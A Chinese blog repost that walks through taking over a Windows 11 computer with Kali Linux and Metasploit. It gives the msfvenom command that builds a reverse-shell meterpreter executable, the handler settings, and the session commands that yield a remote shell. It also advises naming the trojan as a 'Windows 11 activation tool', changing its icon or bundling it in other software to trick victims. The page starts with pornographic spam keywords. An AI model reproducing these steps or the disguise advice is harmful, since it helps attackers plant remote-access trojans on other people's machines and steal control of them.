国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Kali Linux利用MSF滲透Windows11電腦

這篇具有很好參考價值的文章主要介紹了Kali Linux利用MSF滲透Windows11電腦。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

目錄

一、MSF簡介

滲透環(huán)境

二、滲透流程

1.Kali Linux進入Root模式

?2.生成可執(zhí)行文件

3.運行msfconsole命令

?4.配置參數

?5.在靶機Windows11打開可執(zhí)行文件

6.滲透


一、MSF簡介

Msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來生成后門的軟件。
MSFvenom是Msfpayload和Msfencode的組合,將這兩個工具都放在一個Framework實例中。

滲透環(huán)境

使用Kali Linux進行演示操作

目標靶機:Windows11

軟件:Msfvenom、Msfconsole(Kali Linux系統(tǒng)內置)

二、滲透流程

1.Kali Linux進入Root模式

不在Root模式下運行可能會出現操作者權限不夠的提示,為了避免命令執(zhí)行失敗,第一步先將Kali進入Root管理員模式。執(zhí)行命令之后輸入Kali的密碼時,密碼是被隱藏的。

命令:sudo su

Kali Linux利用MSF滲透Windows11電腦

?2.生成可執(zhí)行文件

命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地ip>?LPORT=<本地端口號>?–f exe –o?<文件名>.exe

<本地ip>寫自己Kali Linux的IP地址,用ifconfig就能查看自己Kali的IP地址
<本地端口號>自己隨便設置一個沒有被占用的端口號,如果端口號被占用那么文件會生成失敗,換一個端口號就性
文件名可以隨便寫自己喜歡的名字,比如寫Windows11激活工具等可能更容易讓目標主機上鉤
當然MSF也可以用來滲透Android、Mac、CentOS等

?Kali Linux利用MSF滲透Windows11電腦

這個就是Kali Linux主機的IP地址

?接下來運行命令來生成可執(zhí)行文件Kali Linux利用MSF滲透Windows11電腦

?把生成的可執(zhí)行文件放入目標靶機Windows11中

3.運行msfconsole命令

命令:msfconsole

Kali Linux利用MSF滲透Windows11電腦

?4.配置參數

(1)命令: use exploit/multi/handler(選擇模塊)
(2)命令: set payload windows/meterpreter/reverse_tcp(選擇攻擊模塊)
(3)命令: set LhOST 192.168.88.134(填寫自己主機的IP地址)
(4)命令: set lport 1234(填寫剛才生成文件時的端口號)
(5)命令: show options(查看設置參數)
(6)命令: exploit -z -j(后臺執(zhí)行)
Kali Linux利用MSF滲透Windows11電腦

?5.在靶機Windows11打開可執(zhí)行文件

Kali Linux利用MSF滲透Windows11電腦

在這里我們可以把文件稍微偽裝一下,例如修改圖標或者將其捆綁在某些軟件中,當用戶打開軟件時會自動安裝在其電腦上。

6.滲透

命令:sessions(查看上鉤的目標靶機)

Kali Linux利用MSF滲透Windows11電腦

命令:sessions -i -1(選擇要攻擊的用戶)

Kali Linux利用MSF滲透Windows11電腦

?

這個時候就已經拿到Windows11的shell啦^ ^文章來源地址http://www.zghlxwxcb.cn/news/detail-461876.html

到了這里,關于Kali Linux利用MSF滲透Windows11電腦的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • 利用msf進行內網的木馬滲透詳細教程

    利用msf進行內網的木馬滲透詳細教程

    本文僅限學術交流,請勿用他人實踐 本文通過kali系統(tǒng)進行內網滲透。主機 ip:172.20.10.14 靶機ip:172.20.10.3(win10)? 文章目錄 前言 一 準備工作 二 進行滲透 1.開啟服務:需要開啟apache和postgresql服務 2.制作木馬文件,利用msf進行滲透 總結? 提示:以下是本篇文章正文內容,下

    2023年04月08日
    瀏覽(24)
  • Kali Linux+Windows 11雙系統(tǒng)物理實體機安裝

    Kali Linux+Windows 11雙系統(tǒng)物理實體機安裝

    最開始我想的也是用虛擬機使用Kali,但是奈何配置不好實在得不到什么好的使用體驗。后來是了解到grub是可以引導win系統(tǒng)的,又稍微看了一下谷歌,發(fā)現確實沒什么關于Kali+Windows雙系統(tǒng)安裝的文章,于是就自己先給自己電腦裝了雙系統(tǒng),然后出篇文章來稍微記錄一下。 本文

    2024年02月09日
    瀏覽(25)
  • Kali Linux使用MSF木馬入侵安卓手機

    Kali Linux使用MSF木馬入侵安卓手機

    聲明: 本文章僅做娛樂和學習,切勿非法使用?。?本人技術一般,水平有限,如有不對請多多指正。 Kali Linux 安卓手機一部(安卓11) 要想玩的好,總不能本地玩自己吧,也得和周邊朋友開個玩笑吧,所以就得做內網穿透了,免費內網穿透可以看這位大佬的 CSDN博主「Lisa

    2024年01月24日
    瀏覽(26)
  • 【kali-漏洞利用】(3.4)Metasploit滲透攻擊應用:MySQL滲透過程

    目錄 一、滲透攻擊MySQL 1.1、第一步:信息收集 db_nmap掃描(內置、外置都可) Metasploit模塊 sqlmap 1.2、第二步:獲取服務器權限(爆破) MySQL 口令爆破 哈希值爆破 泄露的源碼中尋找數據庫密碼 向服務器寫WebShell 1.3、第三步:提權 UDF提權(UDF提權) Mof提權 MySQL啟動項提權 1

    2024年02月08日
    瀏覽(24)
  • 滲透測試 ---利用Kali進行簡單的信息收集

    滲透測試 ---利用Kali進行簡單的信息收集

    目錄 Kali環(huán)境安裝配置更新 Linux鏡像文件下載地址 默認用戶名 更新命令 網絡環(huán)境配置 二層發(fā)現 原理 工具 arping netdiscover 三層發(fā)現 原理 工具 ping fping hping3 四層發(fā)現 原理 工具 nmap hping3 Python腳本 端口掃描 原理 工具 nmap Dmitry netcat 端口Banner信息獲取 原理 工具 nmap dmitry netcat

    2024年02月05日
    瀏覽(56)
  • 利用MSF溢出漏洞提權windows server2012

    利用MSF溢出漏洞提權windows server2012

    使用Kali Linux平臺的“metasploit framework”工具,針對Windows2012R2操作系統(tǒng),上傳EXP實現系統(tǒng)提權。 在此之前已經上傳一句話取得admin權限,在自己虛擬機做演示,大家通常取得的權限可能會比admin低,但也是可以進行以下提權的,這里要把目標提權至system權限。 kalil inux Windows S

    2024年01月24日
    瀏覽(44)
  • 網絡安全--Kali滲透Windows

    網絡安全--Kali滲透Windows

    這里我們學習使用Kali攻擊機來滲透Windows,這里使用的是msfvenom木馬來進行滲透。 命令: msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f exe -o payload.exe 這里說明一下,-p 是指使用的工具模塊,lhost是本機的IP地址,lport是本機的端口, -f 是指生成什么樣的文件,簡稱指定

    2024年02月05日
    瀏覽(18)
  • Kali滲透Windows服務器

    這個實驗主要讓我們學習漏洞掃描技術基本原理,了解其在網絡攻防中的作用,掌握使用Kali中的Metasploit對目標主機滲透,并根據報告做出相應的防護措施。 本次實戰(zhàn)環(huán)境:Kali滲透Windows服務器 實戰(zhàn)步驟一 本實驗通過利用kali進行漏洞掃描,使用Metasploit對目標主機進行滲透測

    2024年02月07日
    瀏覽(20)
  • 【Kali Linux高級滲透測試】深入剖析Kali Linux:高級滲透測試技術與實踐

    【Kali Linux高級滲透測試】深入剖析Kali Linux:高級滲透測試技術與實踐

    ??作者簡介: 熱愛跑步的恒川 ,致力于C/C++、Java、Python等多編程語言,熱愛跑步,喜愛音樂的一位博主。 ??本文收錄于恒川的日常匯報系列,大家有興趣的可以看一看 ??相關專欄C語言初階、C語言進階系列、恒川等,大家有興趣的可以看一看 ??Python零基礎入門系列,J

    2024年02月10日
    瀏覽(21)
  • 通過Kali利用永恒之藍漏洞目標主機shell,并進行部分后滲透操作

    通過Kali利用永恒之藍漏洞目標主機shell,并進行部分后滲透操作

    環(huán)境說明 機器 ip地址 Kali主機 192.168.231.129 win7 靶機 192.168.231.143 1.使用kali虛擬機作為攻擊機,利用nmap掃描獲取目標的IP地址及漏洞,將兩個機器包括一個攻擊機Kali、win7的網絡連接模式都是NAT,即在一個網段里面,然后進行掃描網段,查看存活主機,下面是兩臺機器的ip地址查

    2024年02月08日
    瀏覽(24)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包